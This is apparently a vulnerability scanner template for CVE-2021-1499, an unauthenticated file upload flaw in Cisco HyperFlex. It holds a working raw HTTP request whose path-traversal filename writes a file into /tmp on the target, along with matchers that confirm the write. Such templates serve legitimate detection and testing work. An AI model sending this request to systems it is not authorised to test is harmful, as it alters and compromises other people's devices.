id: CVE-2021-1499 info: name: Cisco HyperFlex HX Data Platform - Arbitrary File Upload author: gy741 severity: medium description: Cisco HyperFlex HX Data Platform contains an arbitrary file upload vulnerability in the web-based management interface. An attacker can send a specific HTTP request to an affected device, thus enabling upload of files to the affected device with the permissions of the tomcat8 user. reference: - https://swarm.ptsecurity.com/cisco-hyperflex-how-we-got-rce-through-login-form-and-other-findings/ - https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-hyperflex-upload-KtCK8Ugz - http://packetstormsecurity.com/files/163203/Cisco-HyperFlex-HX-Data-Platform-File-Upload-Remote-Code-Execution.html - https://nvd.nist.gov/vuln/detail/CVE-2021-1499 classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N cvss-score: 5.3 cve-id: CVE-2021-1499 cwe-id: CWE-306 tags: fileupload,intrusive,packetstorm,cve,cve2021,cisco requests: - raw: - | POST /upload HTTP/1.1 Host: {{Hostname}} Accept: */* Accept-Encoding: gzip, deflate Content-Type: multipart/form-data; boundary=---------------------------253855577425106594691130420583 Origin: {{RootURL}} Referer: {{RootURL}} -----------------------------253855577425106594691130420583 Content-Disposition: form-data; name="file"; filename="../../../../../tmp/passwd9" Content-Type: application/json MyPasswdNewData->/api/tomcat -----------------------------253855577425106594691130420583-- matchers-condition: and matchers: - type: status status: - 200 - type: word words: - "application/json" part: header - type: word words: - '{"result":' - '"filename:' - '/tmp/passwd9' condition: and # Enhanced by md on 2022/10/20